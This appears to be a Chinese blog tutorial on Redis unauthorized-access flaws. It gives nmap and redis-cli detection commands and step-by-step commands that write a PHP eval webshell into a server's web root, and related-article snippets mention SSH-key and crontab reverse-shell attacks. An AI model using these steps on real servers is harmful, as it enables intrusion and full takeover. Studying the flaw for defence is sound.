Redis 未授权访问漏洞利用及修复

最新推荐文章于 2025-10-31 14:19:20 发布
原创 最新推荐文章于 2025-10-31 14:19:20 发布 · 4.4k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #redis #web安全 #安全 #系统安全

本文详细介绍了Redis数据库存在的安全风险,包括未授权访问、网站写马、SSH免密码登陆、利用计划任务反弹shell以及主从复制RCE等攻击方式。同时,提供了检测方法和修复建议,如修改配置文件、设置访问密码、限制网络访问等,强调了保护authorized_keys文件的重要性。

漏洞简述

        Redis 是一个高性能的 Key - Value 数据库。Redis 的出现很大程度上弥补了 memcached 这类 Key/Value 存储的不足在部分场合可以对关系数据库起到很好的补充作用。Redis 默认情况下会绑定在 0.0.0.0:6379这样会将 Redis 服务暴露到公网上。在没有开启认证的情况下会导致任意用户在可以访问目标服务器的情况下未经授权就访问到 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法成功地在 Redis 服务器上写入公钥进而可以使用对应私钥直接登录目标服务器。

检测方法

  • 先用 nmap 扫描查看端口开放情况发现开放的 6379 端口为 Redis 的默认端口 
Nmap -A -p 6379 --script redis-info 192.168.10.153
  • Nmap 扫描后发现主机的 6379 端口对外开放可以通过 Redis 客户端进行连接测试是否存在未授权访问漏洞具体命令如下 
./redis-cli -h 192.168.10.153
Info
  • 批量检测脚本
https://github.com/code-scan/rescan
  • 就可以看到 Redis 的版本和服务器上内核的版本信息也可以 del key 删除数据在网站写入木马写入 SSH 公钥或者在 crontab 里写定时任务反弹 shell 等。

漏洞利用

1、网站写马

利用条件:
  • 目标存在web目录
  • 已知web绝对路径
  • 存在写入权限
  • 适用范围:windows,linux版本。
  • ① 先用客户端连接服务器的 redis 服务
redis-cli.exe -h 目标IP
  • ② 连接后设置目录
config set dir /var/www/html    //此路径是服务器端 Web 网站的目录
  • ③ 设置要写入的文件名
config set dbfilename redis88.php      //redis88.php是一句话文件名称
  • ④ 设置要写入的内容
set webshell "<?php @eval($_POST['123']); ?>"      //webshell是名称,可以任意修改
  • ⑤ 保存
save
  • ⑥ 保存后用菜刀连接此木马得到 webshell。

2、结合ssh免密码登陆

最低0.47元/天 解锁文章
Redis未授权访问漏洞介绍及修复方案
YF_Li123的博客
03-25 2564
Redis 漏洞介绍 1. 什么是Redis未授权访问漏洞 Redis 暴露在公网(即绑定在0.0.0.0:6379,目标IP公网可访问),并且没有开启相关认证和添加相关安全策略情况下会被攻击者利用,比如未添加防火墙规则来避免其他非信任IP访问等。 2.有哪些危害 攻击者利用 Redis 未授权访问漏洞读取 Redis 数据库中的数据,可能导致敏感信息泄露或恶意执行 flushall...
漏洞复现之Redis未授权访问
m0_56190544的博客
09-13 3081
本文详细介绍了redis未授权访问漏洞的原理以及利用方法,供大家参考学习
关于Redis未授权访问漏洞利用的介绍与修复建议
09-09
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API,下面这篇文章主要给大家介绍了关于Redis未授权访问漏洞利用的介绍和修复建议,文中介绍的非常详细,需要的朋友可以参考下。
紧急预警:RediShell RCE漏洞(CVE-2025-49844)席卷全球,8500+Redis实例面临入侵风险
最新发布
从零开始,掌握网络安全。提供全面的网络安全教程、攻防演练技巧和行业动态。
10-31 762
2025年10月,Redis曝出高危漏洞RediShell(CVE-2025-49844,CVSS 9.8分),允许攻击者通过Lua脚本引擎实现远程代码执行。全球仍有8500多个未修复Redis实例暴露在公网,美、法、德三国占比超50%。漏洞利用可突破Lua沙箱,导致服务器被完全控制。企业应紧急升级至Redis 8.2.2+版本,或采取启用认证、网络隔离等临时措施。该漏洞暴露了开源组件安全管理不足的问题,建议建立定期更新机制和资产监控体系。
Redis未授权访问漏洞复现的(三种方式)
永不垂头的博客
12-30 4290
Redis未授权访问漏洞复现(三种方式) 一、Redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 二、漏洞简介及危害 漏洞简介 Redis因配置不当就会导致未授权访问。在默认情况下,Redis会绑定在 0.0.0.0:6379。如果没有采用相关的策略,比如添加防火墙规则避免其他非信
Redis未授权访问漏洞
weixin_34149796的博客
09-28 223
  一、漏洞描述和危害  Redis因配置不当可以未授权访问,被攻击者恶意利用。  攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据。  攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。    二、已确认被成功利用的...
redis未授权访问漏洞修复方案
热门推荐
午夜安全
01-16 1万+
1.redis未授权访问漏洞 通过redis未授权访问漏洞,会造成敏感信息泄露,甚至被利用直接控制服务器,其危害不言而喻。但是在实际工作中,发现一些开发人员和运维人员并不知道如何妥善配置。因此有了本文,对redis的配置,建议就是2条,一个就是改强密码,一个就是改端口。 2.redis改密码和端口 给redis设置密码,密码应该由字母、数字、特殊符号组成。像123456,qwer1234这种弱口令肯定不合适,而Q1w@e3r4这种也不合适,因为它太随机、用的人太多,一般密码字典都会收录。所以密码的设置
Redis未授权访问漏洞详解(全面)
m0_64481831的博客
02-26 4693
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下未授权访问Redis以及读取Redis数据。
redis未授权访问漏洞复现
zkaqlaoniao的博客
06-27 921
攻击者在未授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务器登录目标服务器(1) Redis绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
未授权访问漏洞
C233333235的博客
08-04 2096
Redis 默认情况下,会绑定在,如果没有进⾏采⽤相关的策略,⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等,这样将会将 Redis 服务暴露到公⽹上,如果在没有设 置密码认证(⼀般为空)的情况下,会导致任意⽤户在可以访问⽬标服务器的情况下未授权Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利⽤ Redis ⾃身的提供的config 命令,可以进⾏写⽂件操作,攻击者可以成功将⾃⼰的ssh公钥写⼊⽬标服务器的/root/.ssh ⽂件夹的。
修补--Redis未授权访问漏洞
weixin_30342209的博客
01-09 451
--------------------------------阿里云解决方案-----------------------------------一.漏洞描述Redis因配置不当可以导致未授权访问,被攻击者恶意利用。当前流行的针对Redis未授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器,可导致服...
Redis未授权访问漏洞的重现与利用
qq_40882763的博客
03-24 2556
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
redis未授权访问漏洞修复方法_redis密码设置
leenhem的博客
04-15 2949
修复建议 1、网络加固 绑定127.0.0.1,redis默认是监听的127.0.0.1上,如果仅仅是本地通信,请确保监听在本地。这种方式缓解了redis的风险。在/etc/redis/redis.conf中配置如下: [root@localhost ~]# vim /etc/redis.conf bind127.0.0.1 2、设置防火墙 如果需要其他机器访问,或者设置了slave模式,需添加相应的防火墙设置。命令如下: #centos7 [root@localhost ~]# firewall-c
Redis未授权访问漏洞搭建复现
m0_58595840的博客
01-05 3030
Redis未授权访问漏洞利用方式总结(含靶场搭建)
redis未授权访问漏洞利用
zkaqlaoniao的博客
11-16 774
对之前使用nmap扫描到的80端口进行访问,发现了一个页面,判断存在web服务,尝试使用扫描工具对目录进行一个探测。探测到靶机开放了多个端口,其中存在redis服务的6379端口,开始尝试是否存在redis未授权访问漏洞利用之前已经远程连接到的redis数据库,利用写入备份文件的方式,在这个地方可以尝试写入一句话木马。编译后的redis-cli文件存放在src目录中,将其复制到bin目录下,就可以在任意位置执行。将公钥写入到foo.txt文件中,前后使用换行,必然和其他符号连接产生其他不可预知错误。
Redis未授权访问漏洞利用
qq_46634561的博客
09-22 1497
一,Centos7下redis未授权访问漏洞利用方式1、何为redis,有什么内涵2、获取web服务的webshell3、写ssh-keygen公钥登录服务器4、利用计划任务执行命令反弹shell 1、何为redis,有什么内涵 一、Redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助
Redis未授权访问与SSH key利用分析
一、Redis未授权访问漏洞 Redis在安装后,默认情况下会监听所有网络接口(0.0.0.0:6379)。若未开启身份验证机制,任何能够访问到该服务器的用户都可以无限制地读写Redis中的数据。这使得攻击者有机会利用未授权访问...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值